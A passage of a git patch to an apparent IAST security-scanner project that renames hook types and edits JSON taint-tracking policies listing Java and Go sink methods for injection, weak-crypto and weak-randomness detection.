"\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", + "vul_name": "\u90ae\u7bb1\u6cc4\u9732", + "vul_name_en": null, + "vul_name_zh": "\u90ae\u7bb1\u6cc4\u9732", + "vul_type": "\u90ae\u7bb1\u6cc4\u9732" } ] \ No newline at end of file From 57b3de48b3695384d81993272e70e4fb3b47dc86 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 16:59:24 +0800 Subject: [PATCH 111/114] feat: update new strategy. --- static/data/go_full_policy.json | 2 +- static/data/go_hooktype.json | 142 +- static/data/go_policy.json | 20 - static/data/java_full_policy.json | 1100 ++------ static/data/java_hooktype.json | 257 +- static/data/java_policy.json | 4069 ++++++++------------------- static/data/php_hooktype.json | 138 +- static/data/python_full_policy.json | 4 +- static/data/python_hooktype.json | 126 +- static/data/python_policy.json | 222 -- static/data/vul_strategy.json | 250 +- 11 files changed, 1777 insertions(+), 4553 deletions(-) diff --git a/static/data/go_full_policy.json b/static/data/go_full_policy.json index 14a0f0206..70157f70a 100644 --- a/static/data/go_full_policy.json +++ b/static/data/go_full_policy.json @@ -88,7 +88,7 @@ "value": "template.(*Template).ExecuteTemplate()" } ], - "enable": 1, + "enable": 0, "type": 4, "value": "reflected-xss" }, diff --git a/static/data/go_hooktype.json b/static/data/go_hooktype.json index 7f6d62657..6db3d6ddd 100644 --- a/static/data/go_hooktype.json +++ b/static/data/go_hooktype.json @@ -3,141 +3,163 @@ "created_by": 1, "enable": 1, "language": 4, - "name": "1", + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "1", + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 3, - "value": "1" + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "1", + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "1", + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 4, - "value": "1" + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "123", + "name": "\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "123", - "system_type": 0, - "type": 3, - "value": "1" + "name_zh": "\u6587\u4ef6\u5199\u5165", + "system_type": 1, + "type": 4, + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "123", + "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "123", - "system_type": 0, + "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "system_type": 1, "type": 4, - "value": "1" + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "3", + "name": "\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "3", - "system_type": 0, + "name_zh": "\u6587\u4ef6\u5199\u5165", + "system_type": 1, "type": 3, - "value": "3" + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "3", + "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "3", - "system_type": 0, - "type": 4, - "value": "3" + "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "system_type": 1, + "type": 3, + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "\u6587\u4ef6\u5199\u5165", + "name": "JNDI\u6ce8\u5165", "name_en": null, - "name_zh": "\u6587\u4ef6\u5199\u5165", + "name_zh": "JNDI\u6ce8\u5165", "system_type": 1, "type": 4, - "value": "FileWrite" + "value": "JNDI\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name": "JNDI\u6ce8\u5165", "name_en": null, - "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name_zh": "JNDI\u6ce8\u5165", "system_type": 1, - "type": 4, - "value": "FileWrite" + "type": 3, + "value": "JNDI\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "\u6587\u4ef6\u5199\u5165", + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "\u6587\u4ef6\u5199\u5165", - "system_type": 1, + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, "type": 3, - "value": "FileWrite" + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", - "system_type": 1, + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, "type": 3, - "value": "FileWrite" + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "JNDI\u6ce8\u5165", + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "JNDI\u6ce8\u5165", - "system_type": 1, + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, "type": 4, - "value": "JNDI\u6ce8\u5165" + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "JNDI\u6ce8\u5165", + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", "name_en": null, - "name_zh": "JNDI\u6ce8\u5165", - "system_type": 1, + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, "type": 3, - "value": "JNDI\u6ce8\u5165" + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 4, - "name": "\u547d\u4ee4\u6267\u884c123", + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "name_en": null, + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 4, + "name": "\u547d\u4ee4\u6267\u884c ", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c123", + "name_zh": "\u547d\u4ee4\u6267\u884c ", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -406,28 +428,6 @@ "type": 4, "value": "ssrf" }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 3, - "value": "test" - }, - { - "created_by": 1, - "enable": 1, - "language": 4, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 4, - "value": "test" - }, { "created_by": 1, "enable": 1, diff --git a/static/data/go_policy.json b/static/data/go_policy.json index 0c7a1c797..4635fa029 100644 --- a/static/data/go_policy.json +++ b/static/data/go_policy.json @@ -52,26 +52,6 @@ "type": 4, "value": "path-traversal" }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P3", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "template.(*Template).ExecuteTemplate()" - } - ], - "enable": 1, - "type": 4, - "value": "reflected-xss" - }, { "details": [ { diff --git a/static/data/java_full_policy.json b/static/data/java_full_policy.json index 599c2beef..71c260f48 100644 --- a/static/data/java_full_policy.json +++ b/static/data/java_full_policy.json @@ -2790,15 +2790,11 @@ "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "custom-encoded-cmd-injection" - ], + "tags": [], "target": "O", "track": "false", "type": 1, - "untags": [ - "custom-decoded-cmd-injection" - ], + "untags": [], "value": "java.lang.StringBuilder.delete(int,int)" }, { @@ -2956,15 +2952,11 @@ "source": "O|P3", "stack_blacklist": [], "system_type": 1, - "tags": [ - "custom-decoded-cmd-injection" - ], + "tags": [], "target": "O", "track": "false", "type": 1, - "untags": [ - "custom-decoded-cmd-injection" - ], + "untags": [], "value": "java.lang.StringBuilder.replace(int,int,java.lang.String)" }, { @@ -5233,15 +5225,11 @@ "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "custom-decoded-cmd-injection" - ], + "tags": [], "target": "R", "track": "false", "type": 1, - "untags": [ - "custom-encoded-cmd-injection" - ], + "untags": [], "value": "com.fasterxml.jackson.core.JsonParser.getCurrentName()" }, { @@ -6392,808 +6380,34 @@ "untags": [], "value": "org.glassfish.grizzly.http.Cookie.setSecure(boolean)" } - ], - "enable": 1, - "type": 4, - "value": "cookie-flags-missing" - }, - { - "details": [ - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [ - "com.ibm.ejs.util.am._Alarm.run", - "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", - "util.StateUtils.encrypt" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.crypto.Cipher.getInstance(java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [ - "com.ca.siteminder" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.security.Provider)" - } - ], - "enable": 1, - "type": 4, - "value": "crypto-bad-ciphers" - }, - { - "details": [ - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [ - "com.mysql.jdbc", - "org.skife.jdbi.v2.Query", - "com.amazonaws.services.s3.AmazonS3Client.putObject", - "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", - "com.ibm.ws.security.ltpa.LTPAToken2.getBytes", - "com.ibm.ws.ssl.channel.impl.SSLUtils.handleHandshake", - "com.jcraft.jsch.Session.connect", - "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS", - "com.newrelic.agent", - "com.compuware.apm.agent", - "asset.pipeline.AssetPipeline.serveUncompiledAsset", - "controllers.AssetsBuilder", - "JITCompiler", - "java.security.SecureRandom", - "java.util.jar.JarVerifier", - "javax.crypto.JarVerifier", - "jakarta.crypto.JarVerifier", - "maybeNotModified", - "oracle.jdbc.driver", - "java.security.Signature.initVerify", - "oracle.jdbc.xa.client.OracleXADataSource.getXAConnection", - "org.eclipse.jetty.io.ssl.SslConnection", - "org.springframework.web.client.RestTemplate", - "org.thymeleaf.spring4.view.ThymeleafView.render", - "play.api.libs.Codecs$", - "play.api.mvc.CookieBaker", - "play.router.RoutesCompiler", - "play.PlaySourceGenerators", - "sbt.compiler", - "sbt.inc.Stamp", - "org.jets3t.service.utils.ServiceUtils.signWithHmacSha1", - "org.jboss.resteasy.spi.ResteasyDeployment.start" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.security.MessageDigest.getInstance(java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [ - "java.security.SecureRandom", - "java.util.jar.JarVerifier", - "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.security.MessageDigest.getInstance(java.lang.String,java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [ - "java.security.SecureRandom", - "java.util.jar.JarVerifier" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.security.MessageDigest.getInstance(java.lang.String,java.security.Provider)" - } - ], - "enable": 1, - "type": 4, - "value": "crypto-bad-mac" - }, - { - "details": [ - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "java.lang.Math.random()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "java.util.Random.nextBoolean()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.util.Random.nextBytes(byte[])" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "java.util.Random.nextDouble()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "O", - "stack_blacklist": [ - "weblogic.work.IncrementAdvisor.run" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.util.Random.nextFloat()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "java.util.Random.nextGaussian()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "O", - "stack_blacklist": [ - "com.google.gson.JsonObject", - "java.util.Hashtable" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.util.Random.nextInt()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "O", - "stack_blacklist": [ - "getRandomSample", - "java.util.Hashtable", - "NullSafeConcurrentHashMap", - "org.apache.tomcat.websocket.WsWebSocketContainer.generateWsKeyValue", - "org.quartz.core.QuartzSchedulerThread.getRandomizedIdleWaitTime", - "SelectableConcurrentHashMap", - "net.bytebuddy.utility.RandomString.nextString" - ], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.util.Random.nextInt(int)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "java.util.Random.nextLong()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean,char[])" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomAlphabetic(int)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomAlphanumeric(int)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomAscii(int)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomNumeric(int)" - } - ], - "enable": 1, - "type": 4, - "value": "crypto-weak-randomness" - }, - { - "details": [ - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "R", - "track": "false", - "type": 1, - "untags": [], - "value": "org.iast.springsec.common.DataManager.doManage(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "custom-encrypt" - }, - { - "details": [ - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "false", - "type": 4, - "untags": [], - "value": "java.lang.ClassLoader.loadLibrary(java.lang.Class,java.lang.String,boolean)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "java.lang.Runtime.load0(java.lang.Class,java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "dynamic-library-load" - }, - { - "details": [ - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "jakarta.el.ELProcessor.eval(java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "jakarta.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "jakarta.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "jakarta.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "jakarta.el.ExpressionFactory.createMethodExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "jakarta.el.ExpressionFactory.createValueExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "jakarta.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,jakarta.servlet.jsp.el.VariableResolver,jakarta.servlet.jsp.el.FunctionMapper)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.el.ELProcessor.eval(java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.el.ExpressionFactory.createMethodExpression(javax.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P2", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.el.ExpressionFactory.createValueExpression(javax.el.ELContext,java.lang.String,java.lang.Class)" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "", - "track": "true", - "type": 4, - "untags": [], - "value": "javax.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,javax.servlet.jsp.el.VariableResolver,javax.servlet.jsp.el.FunctionMapper)" - }, + ], + "enable": 0, + "type": 4, + "value": "cookie-flags-missing" + }, + { + "details": [ { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "com.ibm.ejs.util.am._Alarm.run", + "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", + "util.StateUtils.encrypt" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object)" + "value": "javax.crypto.Cipher.getInstance(java.lang.String)" }, { "command": "", @@ -7201,17 +6415,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object,java.lang.Class)" + "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.lang.String)" }, { "command": "", @@ -7219,35 +6433,77 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "com.ca.siteminder" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object)" - }, + "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.security.Provider)" + } + ], + "enable": 0, + "type": 4, + "value": "crypto-bad-ciphers" + }, + { + "details": [ { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "com.mysql.jdbc", + "org.skife.jdbi.v2.Query", + "com.amazonaws.services.s3.AmazonS3Client.putObject", + "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", + "com.ibm.ws.security.ltpa.LTPAToken2.getBytes", + "com.ibm.ws.ssl.channel.impl.SSLUtils.handleHandshake", + "com.jcraft.jsch.Session.connect", + "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS", + "com.newrelic.agent", + "com.compuware.apm.agent", + "asset.pipeline.AssetPipeline.serveUncompiledAsset", + "controllers.AssetsBuilder", + "JITCompiler", + "java.security.SecureRandom", + "java.util.jar.JarVerifier", + "javax.crypto.JarVerifier", + "jakarta.crypto.JarVerifier", + "maybeNotModified", + "oracle.jdbc.driver", + "java.security.Signature.initVerify", + "oracle.jdbc.xa.client.OracleXADataSource.getXAConnection", + "org.eclipse.jetty.io.ssl.SslConnection", + "org.springframework.web.client.RestTemplate", + "org.thymeleaf.spring4.view.ThymeleafView.render", + "play.api.libs.Codecs$", + "play.api.mvc.CookieBaker", + "play.router.RoutesCompiler", + "play.PlaySourceGenerators", + "sbt.compiler", + "sbt.inc.Stamp", + "org.jets3t.service.utils.ServiceUtils.signWithHmacSha1", + "org.jboss.resteasy.spi.ResteasyDeployment.start" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object,java.lang.Class)" + "value": "java.security.MessageDigest.getInstance(java.lang.String)" }, { "command": "", @@ -7255,17 +6511,21 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "java.security.SecureRandom", + "java.util.jar.JarVerifier", + "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object)" + "value": "java.security.MessageDigest.getInstance(java.lang.String,java.lang.String)" }, { "command": "", @@ -7273,35 +6533,45 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "java.security.SecureRandom", + "java.util.jar.JarVerifier" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object,java.lang.Class)" - }, + "value": "java.security.MessageDigest.getInstance(java.lang.String,java.security.Provider)" + } + ], + "enable": 0, + "type": 4, + "value": "crypto-bad-mac" + }, + { + "details": [ { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, - "source": "P1", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], 